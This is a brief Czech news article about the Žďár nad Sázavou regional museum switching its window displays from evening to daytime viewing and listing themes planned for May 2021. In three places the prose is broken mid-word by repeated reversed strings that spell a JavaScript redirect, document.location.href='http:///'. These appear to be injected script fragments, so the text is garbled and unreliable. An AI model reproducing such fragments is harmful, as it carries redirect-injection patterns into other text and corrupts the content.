Rainbow page separator

Muzejní okénka se ze „zimních“ večerních změní na denní

Úterý, 27. dubna 2021

Žďár nad Sázavou / Ke změně provozu muzejních „výdejních“ okének, které v době koronavirové alespoň částečně suplují výstavy v interiérech, přis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupili zaměstnanci žďárského regionálního muzea.
„Roční doba pokročila, takže nové instalace nebudou připravené pro večerní nahlížení s umělým osvětlením, nýbrž pro běžnou denní prohlídku. Okénka se budou měnit zhruba po dvou týdnech a budou tematicky laděná. Těšit se můžete na ukáz¬ky užitkové i ozdobné litiny, více i méně známého kuchyňského ná¬dobí či sádrových odlitků z kam¬nářské dílny v Novém Veselí,“ informoval Stanislav Mikule z Regionálního muzea města Žďáru nad Sázavou.
Zájemci se kromě výstav přes okna muzea mohou v průběhu května seznámit i s dalšími zajímavostmi, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na muzejním facebooku, případně webových stránkách. Jde například o Napoleona Bonaparte a vazby Žďáru na dění v době válek s re¬voluční a následně napoleonskou Francií nebo 76. výročí konce druhé svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové války.